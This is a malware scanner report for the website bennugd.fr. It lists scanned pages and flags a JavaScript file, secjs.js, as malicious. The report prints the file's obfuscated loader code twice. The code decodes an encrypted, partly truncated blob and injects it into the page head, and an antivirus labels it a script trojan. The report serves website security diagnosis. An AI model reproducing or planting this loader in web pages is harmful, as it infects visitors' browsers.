New scan:

Malware Scanner report for bennugd.fr

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://bennugd.fr/
200 OK
Content-Length: 33921
Content-Type: text/html
clean
http://bennugd.fr/./includes/fonctions.js
200 OK
Content-Length: 12854
Content-Type: application/javascript
clean
http://connect.facebook.net/fr_FR/all.js
200 OK
Content-Length: 163981
Content-Type: application/x-javascript
clean
http://bennugd.fr/./includes/secjs.js?url_def=http://www.bennugd.fr/
200 OK
Content-Length: 8025
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var h=document.getElementsByTagName('head')[0]; var s=document.createElement('script'); s.type='text/javascript'; s.text=(dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AX%19%A0%EB%AE%E1l%1C%3AW%80%1A%CFz%F7%E5%B1%15%0A%1B%0D%3CDI%BC%3E%D0%3B%F7%0B%B8%AD%AB%F2%DF%13B%979f%83@%AC%3A%B4%C6o%80%B1uq0Cc%3Cu%B5%A1s6%D1%9E%EB18%D3%98%98%96%C6%AD%FCs%3C%7D%15K%82%E6%812%B9H%FET%22%80%BD%E9@%F6W%B2C%E4%C2%17%B2%A2F%1B%FFR%BDWj%E57%23%20%8E%A21r%A3%88%07%01z%9A%FA%A8y4%DF+%1B%FA4%B8%C0%83%ED%18s%13%93%2C0%B9
... 7028 bytes are skipped ...
o%10%D9%94%F2%A0n%06%FB%A6%EB-*%A8GC%A6%97%B3%A0%F6%D7%DEm%EB%AF%1BT%BA%87%AC9%03%DE%19%05O%07%80%EE%E3%D1%13g%20%9Fh%E2%BC%941%A2%3BA5r%5C%0D%7E%F5n%A1%B2%2Ck%18%7El%D4%29%96%D4%1A%DF%21%9Dt%C7%19MK%F5%09%E4%0D_%0CP%01%0Fr%F5%CEo%DCL%E0%7C%A3%20%1D%1F%0D%EC%3Eq%EE%FA%9DU%EBEXv%8Ck%E2o%2C%1B%D8%B3T%89%B4%FE%96%26%83h%9B%E1%B9"))); h.appendChild(s);function dec(txt){var n=42;var p="";for(var i=0;i<txt.length;i++){n=(211*n+1283)%6085;p+=String.fromCharCode(txt.charCodeAt(i)^(n%255));}return p;}

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://bennugd.fr/modules/agenda/overlib.js
200 OK
Content-Length: 49243
Content-Type: application/javascript
clean
http://bennugd.fr/index.php
200 OK
Content-Length: 33921
Content-Type: text/html
clean
http://bennugd.fr/index.php?mod=dofff
200 OK
Content-Length: 34082
Content-Type: text/html
clean
http://bennugd.fr/index.php?mod=forum
200 OK
Content-Length: 26555
Content-Type: text/html
clean
http://bennugd.fr/index.php?mod=downloads
200 OK
Content-Length: 26762
Content-Type: text/html
clean
http://bennugd.fr/index.php?mod=espace_membre&ac=login
200 OK
Content-Length: 11856
Content-Type: text/html
clean
http://bennugd.fr/index.php?mod=page&ac=page&id_page=5
200 OK
Content-Length: 11886
Content-Type: text/html
clean
http://bennugd.fr/./index.php?mod=multi-faq&ac=index&action=faq&id=3
200 OK
Content-Length: 42041
Content-Type: text/html
clean
http://bennugd.fr/././includes/fonctions.js
200 OK
Content-Length: 12854
Content-Type: application/javascript
clean
http://bennugd.fr/././includes/secjs.js?url_def=http://www.bennugd.fr/
200 OK
Content-Length: 8025
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var h=document.getElementsByTagName('head')[0]; var s=document.createElement('script'); s.type='text/javascript'; s.text=(dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AX%19%A0%EB%AE%E1l%1C%3AW%80%1A%CFz%F7%E5%B1%15%0A%1B%0D%3CDI%BC%3E%D0%3B%F7%0B%B8%AD%AB%F2%DF%13B%979f%83@%AC%3A%B4%C6o%80%B1uq0Cc%3Cu%B5%A1s6%D1%9E%EB18%D3%98%98%96%C6%AD%FCs%3C%7D%15K%82%E6%812%B9H%FET%22%80%BD%E9@%F6W%B2C%E4%C2%17%B2%A2F%1B%FFR%BDWj%E57%23%20%8E%A21r%A3%88%07%01z%9A%FA%A8y4%DF+%1B%FA4%B8%C0%83%ED%18s%13%93%2C0%B9
... 7028 bytes are skipped ...
o%10%D9%94%F2%A0n%06%FB%A6%EB-*%A8GC%A6%97%B3%A0%F6%D7%DEm%EB%AF%1BT%BA%87%AC9%03%DE%19%05O%07%80%EE%E3%D1%13g%20%9Fh%E2%BC%941%A2%3BA5r%5C%0D%7E%F5n%A1%B2%2Ck%18%7El%D4%29%96%D4%1A%DF%21%9Dt%C7%19MK%F5%09%E4%0D_%0CP%01%0Fr%F5%CEo%DCL%E0%7C%A3%20%1D%1F%0D%EC%3Eq%EE%FA%9DU%EBEXv%8Ck%E2o%2C%1B%D8%B3T%89%B4%FE%96%26%83h%9B%E1%B9"))); h.appendChild(s);function dec(txt){var n=42;var p="";for(var i=0;i<txt.length;i++){n=(211*n+1283)%6085;p+=String.fromCharCode(txt.charCodeAt(i)^(n%255));}return p;}

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://bennugd.fr/./index.php
200 OK
Content-Length: 33921
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: bennugd.fr

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 03 May 2014 06:51:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: 60gpBAK=R1224192509; path=/; expires=Sat, 03-May-2014 08:05:10 GMT
Set-Cookie: 60gp=R4109666695; path=/; expires=Sat, 03-May-2014 08:07:57 GMT
Set-Cookie: PHPSESSID=d6b86703c320f3281a55c3e333826f40; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bennugd.fr
Referer: http://www.google.com/search?q=bennugd.fr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=bennugd.fr

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bennugd.fr/

Result: bennugd.fr is not infected or malware details are not published yet.